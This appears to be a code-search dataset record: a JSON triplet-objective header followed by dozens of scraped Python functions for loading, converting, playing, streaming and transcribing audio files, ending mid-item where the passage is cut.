{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def read_audio(f, downmix):\n if f.endswith('.mp3'):\n f = _mp3_hook(f)\n sr, audio = scipy.io.wavfile.read(f)\n if not audio.dtype is np.float32:\n audio = _normalize_pcm(audio)\n if downmix and len(audio.shape) == 2:\n audio = down_mix(audio)\n return sr, audio", "def audioRead(path):\n data, samplerate = sf.read(path)\n frames = data.shape[0]\n channels = len(data.shape)\n duration = 1/samplerate*frames\n return data, samplerate, path, duration, frames, channels", "def read_sound(self, inFile):\n\n # Python can natively only read \"wav\" files. To be flexible, use \"ffmpeg\" for conversion for other formats\n if not os.path.exists(inFile):\n print('{0} does not exist!'.format(inFile))\n raise FileNotFoundError\n \n (root, ext) = os.path.splitext(inFile)\n if ext[1:].lower() != 'wav':\n if self.ffmpeg_info.ffmpeg == None:\n print('Sorry, need FFMPEG for non-WAV files!')\n self.rate = None\n self.data = None\n raise NoFFMPEG_Error\n \n outFile = root + '.wav'\n cmd = [self.ffmpeg_info.ffmpeg, '-i', inFile, outFile, '-y']\n subprocess.run(cmd)\n print('Infile converted from ' + ext + ' to \".wav\"')\n \n inFile = outFile\n self.source = outFile\n\n self.rate, self.data = read(inFile)\n \n # Set the filename\n self.source = inFile\n \n # Make sure that the data are in some integer format\n # Otherwise, e.g. Windows has difficulty playing the sound\n # Note that \"self.source\" is set to \"None\", in order to\n # play the correct, converted file with \"play\"\n if not np.issubdtype(self.data.dtype, np.integer):\n self.generate_sound(self.data, self.rate)\n \n self._setInfo()\n print('data read in!')", "def readAudioFile(path):\n\n extension = os.path.splitext(path)[1]\n\n try:\n # Commented below, as we don't need this\n # #if extension.lower() == '.wav':\n # #[Fs, x] = wavfile.read(path)\n # if extension.lower() == '.aif' or extension.lower() == '.aiff':\n # s = aifc.open(path, 'r')\n # nframes = s.getnframes()\n # strsig = s.readframes(nframes)\n # x = numpy.fromstring(strsig, numpy.short).byteswap()\n # Fs = s.getframerate()\n if extension.lower() == '.mp3' or extension.lower() == '.wav' or extension.lower() == '.au' or extension.lower() == '.ogg':\n try:\n audiofile = AudioSegment.from_file(path)\n except:\n print(\"Error: file not found or other I/O error. \"\n \"(DECODING FAILED)\")\n return -1 ,-1\n\n if audiofile.sample_width == 2:\n data = numpy.fromstring(audiofile._data, numpy.int16)\n elif audiofile.sample_width == 4:\n data = numpy.fromstring(audiofile._data, numpy.int32)\n else:\n return -1, -1\n Fs = audiofile.frame_rate\n x = numpy.array(data[0::audiofile.channels]).T\n else:\n print(\"Error in readAudioFile(): Unknown file type!\")\n return -1, -1\n except IOError:\n print(\"Error: file not found or other I/O error.\")\n return -1, -1\n\n if x.ndim == 2:\n if x.shape[1] == 2:\n x = x.flatten()\n\n return Fs, x", "def read_audio(filename, sample_rate = 44100):\n loader = essentia.standard.MonoLoader(filename = filename, sampleRate = sample_rate)\n audio = loader()\n return audio", "def process_sound_file(file_path):\n\n return to_mfcc(get_wav(file_path))", "def get_audio():\n\tbuf = None\n\tnum_new_bytes = BUFFER_SIZE // REFRESH_BUFFER_FACTOR\n\twith open(INFILE) as fifo:\n\t\twhile True:\n\t\t\tif buf is None:\n\t\t\t\tbuf = fifo.read(BUFFER_SIZE)\n\t\t\telse:\n\t\t\t\tbuf = buf[num_new_bytes:] + fifo.read(num_new_bytes)\n\t\t\tyield buf", "def audio(self):\n self.log_string += 'Audio file'\n self._media_processing()", "def process_audio(fname, output_dir, poller):\n result = []\n try:\n if poller.params.candidate_transcripts is not None:\n out_path = \"{}/{}{}\".format(output_dir, os.path.splitext(os.path.basename(fname))[0], \".json\")\n else:\n out_path = \"{}/{}{}\".format(output_dir, os.path.splitext(os.path.basename(fname))[0], \".txt\")\n audio, audio_length = load_audio(fname, poller.params.model.sampleRate())\n pred = transcribe_audio(poller.params.model, audio, candidate_transcripts=poller.params.candidate_transcripts)\n with open(out_path, \"w\") as fp:\n fp.write(pred)\n result.append(out_path)\n except KeyboardInterrupt:\n poller.keyboard_interrupt()\n except:\n poller.error(\"Failed to process audio file: %s\\n%s\" % (fname, traceback.format_exc()))\n return result", "def wavread(filename):\n\n\tif (os.path.isfile(filename) == False): # raise error if wrong input file\n\t\traise ValueError(\"Input file is wrong\")\n\n\tfs, x = read(filename)\n\n\tif (len(x.shape) !=1): # raise error if more than one channel\n x = np.mean(x,axis = 1)\n\t\tprint \"Audio file is stereo, converting to mono\"\n\n\t#scale down and convert audio into floating point number in range of -1 to 1\n\tx = np.float32(x)/norm_fact[x.dtype.name]\n\treturn fs, x", "def play_audio_file(self, fname=DETECT_DONG):\n ding_wav = wave.open(fname, 'rb')\n ding_data = ding_wav.readframes(ding_wav.getnframes())\n # with no_alsa_error():\n audio = pyaudio.PyAudio()\n stream_out = audio.open(\n format=audio.get_format_from_width(ding_wav.getsampwidth()),\n channels=ding_wav.getnchannels(),\n rate=ding_wav.getframerate(), input=False, output=True)\n stream_out.start_stream()\n stream_out.write(ding_data)\n time.sleep(0.2)\n stream_out.stop_stream()\n stream_out.close()\n audio.terminate()", "def load_and_process_audio(self):\n output_vector = None\n doa = None\n if self.model == \"gcc_cnn\":\n output_vector, doa = self.format_gcc_cnn()\n elif self.model == \"gcc_dsp\":\n output_vector, doa = self.format_gcc_dsp()\n elif self.model == \"raw_cnn\":\n output_vector, doa = self.format_raw_audio_cnn()\n elif self.model == \"raw_resnet\":\n output_vector, doa = self.format_raw_audio_cnn()\n else:\n print(\"Error -> No file found\")\n\n return output_vector, doa", "def receive_audio(self):\n print(\"got to receive audio\")\n self.receive_audio_socket = self.start_socket(IP, RECEIVE_AUDIO_PORT)\n self.send_chunk(self.my_name.encode(), self.receive_audio_socket)\n print(self.receive_mes(self.receive_audio_socket))\n\n print(\"receive stream made\")\n i = 0\n done = False\n while not done:\n try:\n i += 1\n data = self.receive_audio_socket.recv(CHUNK) # gets audio chunk\n #print(\"got audio chunk number {} of length {}\".format(i, len(data)))\n self.lock.acquire()\n self.voice_stream.write(data) # plays\n self.lock.release()\n # if len(data) == 0:\n # done = True\n #print(\"wrote chunk #{}\".format(i))\n except socket.error as msg:\n print(\"socket failure receive audio: {}\".format(msg))\n done = True\n except KeyboardInterrupt:\n print(\"exception receive audio\")\n done = True\n self.receive_audio_socket.close()\n # stream_receive.close()\n # p_receive.terminate()", "def run(self):\r\n\r\n p = pyaudio.PyAudio()\r\n\r\n stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),\r\n channels=wf.getnchannels(),\r\n rate=wf.getframerate(),\r\n output=True)\r\n\r\n musicdata = wf.readframes(CHUNK)\r\n\r\n while playing:\r\n if self.streamnum == 1:\r\n stream.write(musicdata)\r\n musicdata = wf.readframes(CHUNK)\r\n else:\r\n stream.write(musicdata)\r\n musicdata = wf2.readframes(CHUNK)\r\n if len(musicdata) < CHUNK or musicdata == '':\r\n if self.streamnum == 1:\r\n self.streamnum = 2\r\n else:\r\n self.streamnum = 1\r\n self.next = False\r\n if self.pause:\r\n while True:\r\n if not playing:\r\n return\r\n elif not self.pause:\r\n break\r\n\r\n stream.stop_stream()\r\n stream.close()\r\n\r\n p.terminate()", "def play(self, context=None):\n\n self.nowPlaying = True\n\n # Open file for reading\n wf = wave.open(self.path + '/' + self.name, 'rb')\n p = pyaudio.PyAudio()\n\n # Open stream for playback\n stream = p.open( format = p.get_format_from_width( wf.getsampwidth() ),\n channels = wf.getnchannels(),\n rate = wf.getframerate(), output = True)\n\n # Read file in chunks of 1024 bytes\n data = wf.readframes(1024)\n\n # Read while there is data left to read\n # If nowPlaying is False, user has clicked Stop\n while data != '' and self.nowPlaying:\n stream.write(data)\n data = wf.readframes(1024)\n\n stream.stop_stream()\n stream.close()\n\n p.terminate()\n\n self.nowPlaying = False\n\n # Callback to UI to signal that audio has finished playing\n if context is not None:\n context.stopAudio()", "def load_audio(self):\n df = pd.read_csv(\"{dir}/iteration_{iter}.csv\".format(dir=self.directory, iter=self.iteration),\n usecols=[1, 2, 3])\n\n doa_from_file = df.iloc[0][1]\n wav_name = df.iloc[0][0]\n filename = \"{dir}/{wav_name}\".format(dir=self.directory, wav_name=wav_name)\n\n y, sr = librosa.load(filename, mono=False)\n\n y_8k = librosa.resample(y, sr, 8000)\n result_x = librosa.util.fix_length(y_8k, 8000)\n\n return result_x, doa_from_file", "def play_audio(filename):\n chunk = 1024\n wf = wave.open(filename, 'rb')\n pa = pyaudio.PyAudio()\n stream = pa.open(\n format=pa.get_format_from_width(wf.getsampwidth()),\n channels=wf.getnchannels(),\n rate=wf.getframerate(),\n output=True\n )\n data_stream = wf.readframes(chunk)\n while data_stream:\n stream.write(data_stream)\n data_stream = wf.readframes(chunk)\n stream.close()\n pa.terminate()", "def read_audio(file_path, resample_rate=None, to_mono=False):\n return librosa.load(file_path, sr=resample_rate, mono=to_mono)", "def play_audio(file: str) -> None:\n pygame.mixer.init()\n pygame.mixer.music.load(file)\n pygame.mixer.music.play()\n\n while pygame.mixer.music.get_busy():\n continue", "def play(self):\n\n try:\n if self.source is None:\n # If there is no source-file, write the data to a temporary WAV-file ...\n tmpFile = tempfile.NamedTemporaryFile(suffix='.wav', delete=False)\n tmpFile.close()\n self.write_wav(tmpFile.name)\n \n # ... and play that file\n if sys.platform=='win32':\n winsound.PlaySound(tmpFile.name, winsound.SND_FILENAME)\n elif sys.platform == 'darwin':\n cmd = ['afplay', tmpFile.name]\n subprocess.run(cmd)\n else:\n pygame.init()\n pygame.mixer.music.load(tmpFile.name)\n pygame.mixer.music.play()\n time.sleep(self.duration)\n \n # If you want to use FFMPEG instead, use the following commands:\n #cmd = [self.ffmpeg_info.ffplay, '-autoexit', '-nodisp', '-i', tmpFile.name]\n #subprocess.run(cmd)\n \n elif os.path.exists(self.source):\n # If you have a given input file ...\n print('Playing ' + self.source)\n \n # ... then play that one\n if sys.platform == 'win32':\n winsound.PlaySound(str(self.source), winsound.SND_FILENAME)\n elif sys.platform == 'darwin':\n cmd = ['afplay', str(self.source)]\n subprocess.run(cmd)\n else:\n pygame.init()\n pygame.mixer.music.load(self.source)\n pygame.mixer.music.play()\n time.sleep(self.duration)\n \n # If you want to use FFMPEG instead, use the following commands:\n #cmd = [self.ffmpeg_info.ffplay, '-autoexit', '-nodisp', '-i', self.source]\n #subprocess.run(cmd)\n \n except SystemError:\n print('If you don''t have FFMPEG available, you can e.g. use installed audio-files. E.g.:')\n print('import subprocess')\n print('subprocess.run([r\"C:\\Program Files (x86)\\VideoLAN\\VLC\\vlc.exe\", r\"C:\\Music\\14_Streets_of_Philadelphia.mp3\"])')", "def read_audio(self, path_to_wav):\n y, sr = librosa.load(path_to_wav, sr=None)\n return (y, sr)", "def process_files(audio_files, context=[]):\n\n results = []\n bar_limit = len(audio_files)\n client = speech.SpeechClient()\n with Bar('Processing:', max=bar_limit) as bar:\n for audio in audio_files:\n response = convert_speech_to_text(client, audio, context)\n (transcription, confidence) = transcript(response)\n results.append({\n \"path\": audio,\n \"transcription\": transcription,\n \"confidence\": confidence\n })\n bar.next()\n return results", "def inputwav(filename):\n data, sr = sf.read(filename)\n print('Decoding \"'+filename+'\"...')\n print('Sample rate is '+str(sr)+'...')\n try:\n ch=len(data[0,])\n except:\n ch=1\n print('File contains '+str(ch)+' audio channel(s)...')\n #Reshape the data so other functions can interpret the array if mono.\n #basically transposing the data\n if ch==1:\n data=data.reshape(-1,1)\n n=len(data)\n #This prevents log(data) producing nan when data is 0\n data[np.where(data==0)]=0.00001\n #convert to dB\n data_dB=20*np.log10(abs(data))\n return n, data,data_dB,sr, ch", "def loadAudio(self,path):\r\n if self.vid:# Release video to access\r\n self.vid.release()\r\n # Check if has audio\r\n mixer.music.unload()\r\n command = \"ffprobe -i \\\"{0}\\\" -show_streams -select_streams a -loglevel error\".format(path)\r\n result = run(command,stdout=PIPE,stderr=PIPE,universal_newlines=True,shell=True)\r\n if result.stdout.startswith(\"[STREAM]\"):# Contains audio\r\n self.hasAudio = True\r\n else:\r\n self.hasAudio = False\r\n return\r\n print(\"Preparing Audio...\",end=\"\")\r\n filename = \"project_audio.mp3\"\r\n self.aud_path = filename\r\n t_start = time.time()\r\n # Extract audio using ffmpeg, always overwrite\r\n command = \"ffmpeg -y -i \\\"{0}\\\" \\\"{1}\\\"\".format(path,filename)\r\n result = run(command,stdout=PIPE,stderr=PIPE,universal_newlines=True,shell=True)\r\n## print(result.stderr)\r\n t_end = time.time()\r\n print(\"Done[{0}]\".format(int(t_end-t_start)))\r\n try:\r\n mixer.music.unload()\r\n mixer.music.load(filename)\r\n except:\r\n print(\"Error Loading Audio\")\r\n self.hasAudio = False\r\n self.vid = cv2.VideoCapture(self.vid_path)# Reload video component\r\n # Launch in GUI Thread\r", "def readAudioData(self, shouldProcess):\n if shouldProcess:\n return gatherData(self.playlists) \n else:\n return pd.read_pickle(\"data/audioDF.pkl\")", "def read_process_song(path, window=1, overlap=0, debug=True):\n\n arr_features = []\n\n signal, sr = librosa.load(path)\n signal = signal[:660000]\n\n # Debug process\n if debug:\n print(\"Reading file: {}\".format(path))\n\n # Split songs:\n samples = split_songs(signal, window, overlap)\n\n # Append the result to the data structure\n for s in samples:\n features = get_features(s, sr)\n arr_features.append(features)\n return arr_features", "def process_file(self, file_name):\n logger.info(f'Recognising speech for {file_name}')\n wf = wave.open(file_name, \"rb\")\n # Check to see if the audio file can be read by the Vosk model\n if wf.getnchannels() != 1 or wf.getsampwidth() != 2 or wf.getcomptype() != \"NONE\":\n raise Exception(f'Invalid file format for {file_name}')\n rec = KaldiRecognizer(self.model, wf.getframerate())\n results = []\n while True:\n data = wf.readframes(config.frame_to_read)\n # If the data we have read is empty then we are at the end of the file\n if len(data) == 0:\n break\n if rec.AcceptWaveform(data):\n result = json.loads(rec.Result())\n # Result can contain an empty text string but no result list\n if len(result['text']) > 0:\n # If we reach here we have accepted the translation of a section of text\n results.extend(result['result'])\n result = json.loads(rec.FinalResult())\n # Add to results list\n if len(result['text']) > 0:\n results.extend(result['result'])\n logger.info(f'Processed speech, captured {len(results)} results')\n return results", "def handle_audio_input(message):\n def build_context(msg: Message):\n ctx = {'client_name': 'mycroft_listener',\n 'source': msg.context.get(\"source\" or \"speech_api\"),\n 'destination': [\"skills\"],\n \"audio_parser_data\": msg.context.get(\"audio_parser_data\"),\n \"client\": msg.context.get(\"client\"), # origin (local, klat, nano, mobile, api)\n \"neon_should_respond\": msg.context.get(\"neon_should_respond\"),\n \"username\": msg.context.get(\"username\"),\n \"timing\": {\"start\": msg.data.get(\"time\"),\n \"transcribed\": time.time()},\n \"ident\": msg.context.get(\"ident\", time.time())\n }\n if msg.context.get(\"klat_data\"):\n ctx[\"klat_data\"] = msg.context(\"klat_data\")\n ctx[\"nick_profiles\"] = msg.context.get(\"nick_profiles\")\n return ctx\n\n ident = message.context.get(\"ident\") or \"neon.audio_input.response\"\n wav_file_path = message.data.get(\"audio_file\")\n lang = message.data.get(\"lang\")\n try:\n _, parser_data, transcriptions = _get_stt_from_file(wav_file_path, lang)\n message.context[\"audio_parser_data\"] = parser_data\n context = build_context(message)\n data = {\n \"utterances\": transcriptions,\n \"lang\": message.data.get(\"lang\", \"en-us\")\n }\n handled = _emit_utterance_to_skills(Message('recognizer_loop:utterance', data, context))\n bus.emit(message.reply(ident, data={\"parser_data\": parser_data,\n \"transcripts\": transcriptions,\n \"skills_recv\": handled}))\n except Exception as e:\n LOG.error(e)\n bus.emit(message.reply(ident, data={\"error\": repr(e)}))", "def load_audio(file_path):\n # load the audio file in its original sampling rate\n audio_data, sr = librosa.load(file_path, sr=sampling_rate)\n\n # get the common file name\n file_name = file_path.split(\"/\")[-1]\n file_name = file_name.split(\".wav\")[0]\n\n # calculate number of samples in the time duration needed\n num_samples = int(sr*time_duration)\n\n # get the cut-off audio signals and save them\n for i in np.arange(num_audio_files):\n audio_cut_data = cut_sample(audio_data, num_samples)\n file_path=dir_to_save + file_name + \"_\" + str(i+1) + \".wav\"\n save_sample(audio_cut_data, file_path, sr)\n print(f\"generating signal {str(i)}, its length {len(audio_cut_data)} by cutting the original signal\")", "def read_audiofile(audio_name,cutToLength):\n fs, data = wavfile.read(audio_name)\n # sa.play_buffer(audio_data, num_channels, bydeftes_per_sample,sample_rate)\n #play_obj = sa.play_buffer(data,1,2,fs)\n #play_obj.stop()\n # delete one column. Make mono channel\n if data.shape[1]>1:\n data = numpy.delete(data,1,1)\n #downsample if signal is broad\n if fs>24000:\n data = numpy.delete(data, numpy.s_[::2], 0)\n fs = int(fs/2)\n \n data = data[data!=0]\n data = numpy.delete(data,numpy.s_[ int(cutToLength*fs):len(data)] )\n return data", "def play_audio():\n directory = os.fsencode(MINI_PATH)\n print(directory)\n adp= []\n # lst = os.listdir(directory)\n # lst.sort()\n for file in os.listdir(directory):\n filename = os.fsdecode(file)\n #print(file)\n\n if filename.endswith(\".mp3\"): \n adp.append(MINI_PATH+filename)\n #print(adp)\n adp.sort()\n print(\"ADP: \", adp)\n x = \"|\".join(adp)\n print( f'concat:{x}')\n subprocess.call(['ffmpeg', '-i', f'concat:{x}', '-acodec', 'copy', RESULT_PATH])\n \n for file in os.listdir(directory):\n filename = os.fsdecode(file)\n print(filename)\n if filename.endswith(\".mp3\"):\n os.remove(MINI_PATH+filename)", "def readFile(filename):\r\n speechFile = open(filename, \"r\")\r\n speech = speechFile.read()\r\n speechFile.close()\r\n return speech", "def process_audio_multiprocess(file_paths_arr,\n filt_type, filt_cutoff_freq, filt_order,\n trim_margin_left, trim_margin_right, trim_top_db, trim_window_length, trim_hop_length, trim_ref, trim_preemphasis_strength,\n SAMPLE_RATE=48000, MIN_SAMPLE_RATE=15999, BIT_DEPTH=2,\n ignore_dirs=[\"Noise samples\",\"_Noisy_\",\"_Very Noisy_\"], skip_existing=False,\n in_ext_=None, out_ext=\".wav\", use_tqdm=True, dump_sample_rates=True\n ):\n import soundfile as sf\n import scipy\n from scipy import signal\n \n if dump_sample_rates:\n sample_rates = {} # array of dicts. e.g: [{path 0: sample_rate 0}, {path 1: sample_rate 1}, {path 2: sample_rate 2}, ...]\n \n skip = 0\n prev_sr = 0\n iterator = tqdm(file_paths_arr, smoothing=0.0) if use_tqdm else file_paths_arr\n for file_path in iterator: # recursive directory search\n in_ext = in_ext_ if (in_ext_ is not None) else os.path.splitext(os.path.split(file_path)[-1])[-1] # get ext from file_path or use override.\n out_path = file_path.replace(in_ext,out_ext)\n if skip_existing and os.path.exists(out_path):\n continue\n if any([filter_dir in file_path for filter_dir in ignore_dirs]):\n continue\n \n # VCTK cleanup\n #if file_path.endswith(f\"_mic1{in_ext}\"):\n # os.rename(file_path, file_path.replace(f\"_mic1{in_ext}\",in_ext))\n #if file_path.endswith(f\"_mic2{in_ext}\"):\n # continue\n try:\n native_sound, native_SR = sf.read(file_path, always_2d=True)\n except RuntimeError as ex:\n print(f'\"{os.path.split(file_path)[-1]}\" failed to load and has been deleted.\\nDELETED PATH: \"{file_path}\"')\n os.unlink(file_path)\n #raise RuntimeError(ex)\n native_sound = native_sound[:,0]# take first channel (either mono or left audio channel)\n native_sound = np.asfortranarray(native_sound).astype('float64') # and ensure the audio is contiguous\n \n if native_SR < MIN_SAMPLE_RATE: # skip any files with native_SR below the minimum\n continue\n if native_SR != SAMPLE_RATE: # ensure all audio is same Sample Rate\n try:\n sound = librosa.core.resample(native_sound, native_SR, SAMPLE_RATE)\n except ValueError as ex:\n print(ex, file_path, native_SR, len(native_sound), sep=\"\\n\")\n raise ValueError(ex)\n else:\n sound = native_sound\n \n if dump_sample_rates:\n sample_rates[os.path.abspath(out_path)] = native_SR\n \n # 24 bit -> 16 bit, 32 bit -> 16 bit\n if max(np.amax(native_sound), -np.amin(native_sound)) > (2**23): # if samples exceed values possible at 24 bit\n sound = (sound / 2**(31-15))#.astype('int16') # change bit depth from 32 bit to 16 bit\n elif max(np.amax(native_sound), -np.amin(native_sound)) > (2**15): # if samples exceed values possible at 16 bit\n sound = (sound / 2**(23-15))#.astype('int16') # change bit depth from 24 bit to 16 bit\n \n # apply audio filters\n for type_, freq_, order_ in zip(filt_type, filt_cutoff_freq, filt_order): # eg[ ['lp'], [40], [10] ] # i.e [type, freq, strength]\n sos = signal.butter(order_, freq_, type_, fs=SAMPLE_RATE, output='sos') # calcuate filter somethings\n sound = signal.sosfilt(sos, sound) # apply filter\n \n # apply audio trimming\n for i, (margin_left_, margin_right_, top_db_, window_length_, hop_length_, ref_, preemphasis_strength_) in enumerate(zip(trim_margin_left, trim_margin_right, trim_top_db, trim_window_length, trim_hop_length, trim_ref, trim_preemphasis_strength)):\n if preemphasis_strength_:\n sound_filt = librosa.effects.preemphasis(sound, coef=preemphasis_strength_)\n _, index = librosa.effects.trim(sound_filt, top_db=top_db_, frame_length=window_length_, hop_length=hop_length_, ref=ref_) # gonna be a little messed up for different sampling rates\n else:\n _, index = librosa.effects.trim(sound, top_db=top_db_, frame_length=window_length_, hop_length=hop_length_, ref=ref_) # gonna be a little messed up for different sampling rates\n try:\n sound = sound[int(max(index[0]-margin_left_, 0)):int(index[1]+margin_right_)]\n except TypeError:\n print(f'Slice Left:\\n{max(index[0]-margin_left_, 0)}\\nSlice Right:\\n{index[1]+margin_right_}')\n assert len(sound), f\"Audio trimmed to 0 length by pass {i+1}\\nconfig = {[margin_left_, margin_right_, top_db_, window_length_, hop_length_, ref_]}\\nFile_Path = '{file_path}'\"\n \n # write updated audio to file\n if os.path.exists(out_path):\n os.unlink(out_path) # using unlink incase the out_path object is a symlink\n sf.write(out_path, sound, SAMPLE_RATE)\n \n if dump_sample_rates:\n return sample_rates", "def load_audio(path):\r\n if path[-4:] == \".wav\":\r\n fs, data = load_wav(path)\r\n\r\n elif path[-4:] == \".mp3\":\r\n fs, data = load_mp3(path)\r\n\r\n else:\r\n raise ValueError(\"Wrong file format, use mp3 or wav\")\r\n\r\n return fs, data", "def stream_file(filename):\n wf = wave.open(filename, 'rb')\n # read in ~100ms chunks\n chunk = int(wf.getframerate() / 10)\n data = wf.readframes(chunk)\n while True:\n try:\n while connected:\n if data != '' and len(data) != 0:\n sio.emit('data', data)\n # sleep for the duration of the audio chunk\n # to mimic real time playback\n sio.sleep(0.1)\n data = wf.readframes(chunk)\n else:\n print('EOF, pausing')\n sio.sleep(0.5)\n wf = wave.open(filename, 'rb')\n data = wf.readframes(chunk)\n print('restarting playback')\n sio.sleep(0.2)\n except socketio.exceptions.ConnectionError as err:\n print('Connection error: %s! Retrying at %s' %\n (err, datetime.utcnow()))\n except KeyboardInterrupt:\n return", "def load_audio(path, target_fs=None):\n y, fs = sf.read(path)\n if y.ndim>1:\n y = np.mean(y, axis=1)\n if target_fs is not None and fs!=target_fs:\n #print('Resampling %d->%d...' %(fs, target_fs))\n y = librosa.resample(y, orig_sr=fs, target_sr=target_fs)\n fs = target_fs\n return y, fs", "def recorder():\n # Following block gets rid of annoying config errors by ALSA\n def py_error_handler(filename, line, function, err, fmt):\n pass\n ERROR_HANDLER_FUNC = CFUNCTYPE(None, c_char_p, c_int, c_char_p, c_int, c_char_p)\n c_error_handler = ERROR_HANDLER_FUNC(py_error_handler)\n asound = cdll.LoadLibrary('libasound.so')\n asound.snd_lib_error_set_handler(c_error_handler) \n\n p = pyaudio.PyAudio()\n stream = p.open(format=FORMAT, channels=1, rate=RATE,\n input=True, output=True,\n frames_per_buffer=CHUNK_SIZE)\n\n yield stream\n\n stream.stop_stream()\n stream.close()\n p.terminate()", "def analyzeWAV(inputFile):\n data, fs, nbits = audiolab.wavread(inputFile)\n samplingRate = fs\n return [data, samplingRate]", "def load_music_files():\n # Make a list of music files, right now it is done by collection all files\n # below the current folder whose extension starts with mp3/wav \n print('Loading music files...')\n for path, dirs, files in os.walk('.'):\n for file_ in files:\n file_path = os.path.relpath(os.path.join(path, file_))\n url_path = os.path.join(*[quote(part) for part in os.path.split(file_path)]) \n ext = os.path.splitext(file_)[1].lower()\n name = os.path.splitext(file_)[0].lower()\n key = ''.join(name.split()) # unique key - no spaces\n audio_file = None\n if ext.startswith('.mp3'):\n audio = MP3(file_path) \n audio_file = AudioFile(url_path, audio.info.length, name, key) \n if audio_file:\n music_files.append(audio_file)\n print('Found:', music_files[-1])", "def load_audio(fhandle: BinaryIO) -> Tuple[np.ndarray, float]:\n audio, sr = librosa.load(fhandle, sr=22050, mono=True)\n return audio, sr", "async def play(self, ctx, *, filename: str):\r\n if not ctx.voice_client:\r\n await self.connect(ctx)\r\n if filename not in self.audio_files:\r\n await ctx.send(\"File {0} not found\".format(filename))\r\n await self.audiofiles(ctx)\r\n else:\r\n ctx.voice_client.play(discord.FFmpegPCMAudio(source=\"{0}{1}.mp3\".format(self.audio_base_dir, filename)))\r\n await ctx.message.delete()", "def test_process_mono_file(self):\n test_path = pathlib.Path(__file__).parent.absolute() / 'data/mono.wav'\n self.default_kwargs['input_file'] = test_path\n self.default_kwargs['output_file'] = pathlib.Path(self.temp_file.name)\n self.encoder = FileEncoder(**self.default_kwargs)\n self.encoder.process()", "def load_audio(fhandle: BinaryIO) -> Tuple[np.ndarray, float]:\n return librosa.load(fhandle, sr=44100, mono=True)", "def read(self, path, size, offset, fh, *args, **pargs):\n with self.rwlock:\n if(path in self._open_subtracks):\n real = False\n # Update the last accessed time.\n self._open_subtracks[path]['Last Access'] = time.time()\n # Store the requested offset.\n self._open_subtracks[path]['Positions'][fh] = offset\n else:\n real = True\n if(real):\n # For all non-FLACCue files, just access it normally.\n os.lseek(fh, offset, 0)\n return os.read(fh, size)\n # Wait for the file to finish opening.\n while(True):\n with(self.rwlock):\n self._open_subtracks[path]['Last Access'] = time.time()\n if(self._open_subtracks[path]['Audio'] is not None):\n audio = self._open_subtracks[path]['Audio']\n break\n time.sleep(0.1)\n # Return the data requested.\n if(offset > len(audio)):\n # If we're looking near the end of the file,\n # handle the fact that compression could change the size.\n reported_size = self.getattr(path)['st_size']\n if(offset < reported_size):\n offset = len(audio) - (reported_size - offset)\n return audio[offset:offset+size].tobytes()", "def read( self, song_file_name ):\n song_file = open( song_file_name )\n content = song_file.read()\n return self.split( content )", "def read_audio(ws):\n # Open stream\n global RATE\n p = pyaudio.PyAudio()\n RATE = int(p.get_default_input_device_info()['defaultSampleRate'])\n stream = p.open(format=FORMAT,\n channels=CHANNELS,\n rate=RATE,\n input=True,\n frames_per_buffer=CHUNK)\n\n # Recognize until timeout or recognition\n for i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):\n if not RUNNING:\n break\n data = stream.read(CHUNK)\n ws.send(data, ABNF.OPCODE_BINARY)\n\n print(\"Stopped listening\")\n # Disconnect the audio stream\n stream.stop_stream()\n stream.close()\n # Close the WebSocket\n ws.close()\n # Kill the audio device\n p.terminate()", "def read_write_audio(self):\n\n if (self.local_audio_play and\n (self.mem_player.get_write_available() > self.cfg['Audio']['samples_per_frame'] * 2)):\n # send a frame from input to be played\n data_play = self.local_audio_play.popleft()\n\n if self.audio_playing and isinstance(data_play, Frame):\n if len(data_play) == self.cfg['Audio']['samples_per_frame'] * 2:\n self.last_frame_id = self.mem_player.put_frame(data_play.payload)\n self.cfg['Logging']['session_logger'].rec_write(self.audio_playing, data_play.payload)\n\n elif isinstance(data_play, Command):\n if data_play.parsed['__name__'] == 'utterance_start':\n self.audio_playing = data_play.parsed['fname']\n self.message_queue.append(\n (Command('play_utterance_start(user_id=\"{uid}\",fname=\"{fname}\")'\n .format(uid=data_play.parsed['user_id'], fname=data_play.parsed['fname']),\n 'VoipIO', 'HUB'),\n self.last_frame_id))\n try:\n if data_play.parsed['log'] == \"true\":\n self.cfg['Logging']['session_logger'].rec_start(\"system\", data_play.parsed['fname'])\n except SessionLoggerException as e:\n self.cfg['Logging']['system_logger'].exception(e)\n\n if self.audio_playing and data_play.parsed['__name__'] == 'utterance_end':\n self.audio_playing = None\n self.message_queue.append(\n (Command('play_utterance_end(user_id=\"{uid}\",fname=\"{fname})'\n .format(uid=data_play.parsed['user_id'], fname=data_play.parsed['fname']),\n 'VoipIO', 'HUB'),\n self.last_frame_id))\n try:\n if data_play.parsed['log'] == \"true\":\n self.cfg['Logging']['session_logger'].rec_end(data_play.parsed['fname'])\n except SessionLoggerException as e:\n self.cfg['Logging']['system_logger'].exception(e)\n\n if (self.mem_capture.get_read_available() > self.cfg['Audio']['samples_per_frame'] * 2):\n # Get and send recorded data, it must be read at the other end.\n data_rec = self.mem_capture.get_frame()\n\n # send the audio only if the call is connected\n # ignore any audio signal left after the call was disconnected\n if self.audio_recording:\n self.audio_record.send(Frame(data_rec))", "def direct_play(file_name,\n sample_rate = 44100,\n chunk = 1024,\n channel = 1,\n width = 2):\n \n data_file = open(file_name, 'rb', chunk)\n\n # PyAudio instance\n p = pyaudio.PyAudio()\n\n # Open stream\n stream = p.open(format = p.get_format_from_width(width),\n channels = channel,\n rate = sample_rate,\n output = True)\n\n data = data_file.read(chunk)\n\n # Playing the data\n while data != \"\":\n stream.write(data)\n data = data_file.read(chunk)\n\n # Ending things\n stream.stop_stream()\n stream.close()\n p.terminate()", "def load_audio_data(file_path, config):\n pure_path = pathlib.PurePath(file_path)\n audio_seg = pydub.AudioSegment.from_file(pure_path, pure_path.suffix[1:])\n if audio_seg.frame_rate != config.sample_rate_hertz:\n raise ValueError(\"Mismatch in sample rate: expected: %d; got: %d\" % (\n config.sample_rate_hertz, audio_seg.frame_rate))\n if audio_seg.channels != config.audio_channel_count:\n raise ValueError(\n \"Mismatch in audio channel count: expected: %d; got: %d\" % (\n config.audio_channel_count, audio_seg.channels))\n samples = list(audio_seg.get_array_of_samples())\n # NOTE(cais): We currently use LINEAR16 in the stream requests regardless of\n # the original audio file format. Is it possible to avoid converting FLAC to\n # LINEAR16 during these cloud requests?\n return struct.pack('<%dh' % len(samples), *samples)", "def 